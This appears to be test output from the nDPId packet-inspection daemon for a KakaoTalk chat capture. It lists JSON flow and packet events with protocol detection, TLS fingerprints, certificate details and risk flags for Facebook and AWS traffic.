-01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="} +00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031611,"flow_last_seen":1430069031611,"flow_idle_time":7560000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":1,"thread_ts_msec":1430069031611,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1430069031611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":113,"pkt_l4_len":77,"thread_ts_msec":1430069031611,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGHTnUAAQAbVXgoYUrw2\/\/3H5i8UZ+uf0VkGiXPCgBgCYxkQAAABAQgKAAKTKDTnT0kXAwEAKNOo\/lFrrxEtj1oyrBEybZXAvF7754xqLjvuYfV0gCpDpumAA3\/lW60="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035398,"flow_last_seen":1430069035398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069035398,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"210.103.240.15","src_port":42332,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1430069035398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035398,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChV8UAAQAbFkwoYUrzSZ\/APpVwBu+YrTKNirTiWUBFpAB9mAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1430069035537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035537,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkaUAAjgapG9Jn8A8KGFK8AbulXGKtOJbmK0ykUBCkj3bOAAA="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035840,"flow_last_seen":1430069035840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1430069035840,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035840,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADytk0AAPwbN8woYUrwfDURUkrUAUM0qoIsAAAAAoAI5CEEgAAACBAV4BAIICgALDRgAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1430069035877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069035877,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxm7kAA+AZbqB8NRFQKGFK8AFCStWTibgPNKqCMYBIRHPNeAAACBAV4"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1430069035880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069035880,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACitlEAAPwbOBgoYUrwfDURUkrUAUM0qoIxk4m4EUBA5COLzAAA="} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069035840,"flow_last_seen":1430069035921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1430069035921,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069035967,"flow_last_seen":1430069035967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069035967,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1430069035967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069035967,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzw1UAAPwaKsQoYUrwfDURUsJ0Bu3W4\/fMAAAAAoAI5CBvJAAACBAV4BAIICgALDSYAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1430069036008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036008,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACxGQkAA+AZ8VB8NRFQKGFK8AbuwnWIYU8F1uP30YBIRHOshAAACBAV4"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1430069036010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036010,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjw1kAAPwaKxAoYUrwfDURUsJ0Bu3W4\/fRiGFPCUBA5CNq2AAA="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069035967,"flow_last_seen":1430069036012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036012,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069036068,"flow_last_seen":1430069036068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069036068,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1430069036068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069036068,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwqSkAAPwalnwoYUryt\/GECircBu1PEJ3oAAAAAoAI5CI51AAACBAV4BAIICgALDTAAAAAAAQMDBw=="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1430069036109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069036109,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACzrl0AA+AYrYa38YQIKGFK8AbuKt2bo6WFTxCd7YBIRHMNnAAACBAV4"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1430069036113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069036113,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgqS0AAPwalsgoYUryt\/GECircBu1PEJ3tm6OliUBA5CLL8AAA="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069036068,"flow_last_seen":1430069036116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069036116,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069035967,"flow_last_seen":1430069036121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036121,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1430069035967,"flow_last_seen":1430069036179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3732,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1430069036179,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45213,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":258,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069036068,"flow_last_seen":1430069036608,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1430069036608,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1430069036068,"flow_last_seen":1430069036612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3731,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069036612,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069044758,"flow_last_seen":1430069044758,"flow_idle_time":7560000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1430069044758,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":293,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1430069044758,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":303,"pkt_l4_len":267,"thread_ts_msec":1430069044758,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAR8KJUAAjgb4zIuWAH0KGFK8Abu3Y2Ij0KVRKAPiUBigLueuAADzAAAApDlIVrVdqRc+Gkt7POZ3i2OlkuY4MMfPTZY9G4U0YFfr\/Io7pOCQe3JDBNAmPdEpHGIlOOWztPzNgfmCZdfJbXa\/FjyLrCbe\/cKrmuhEYDyIPsoQcOHY3YFPdOkSmKChheXsyu06po9uQ1CWTJDZfqoByGUY9M3+\/torvsssHclmFyrgMhiQBPDR+\/p96Y\/\/sK6VRP8W+SfBO5i7Jg3brhWvS81m7IbytFR73ZERAlFn0QejuZzhem715ywfbXU8ySrwRBK2cs3ywClzqW\/s7h0teJNcn45XHRR+Z0ZTPA29+kHM57k5C1faf1I\/3jeLMDw\/"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1430069044836,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069044836,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTekAAQAZ+bgoYUryLlgB9t2MBu1EoA+JiI9GcUBCIgOkBAAA="} 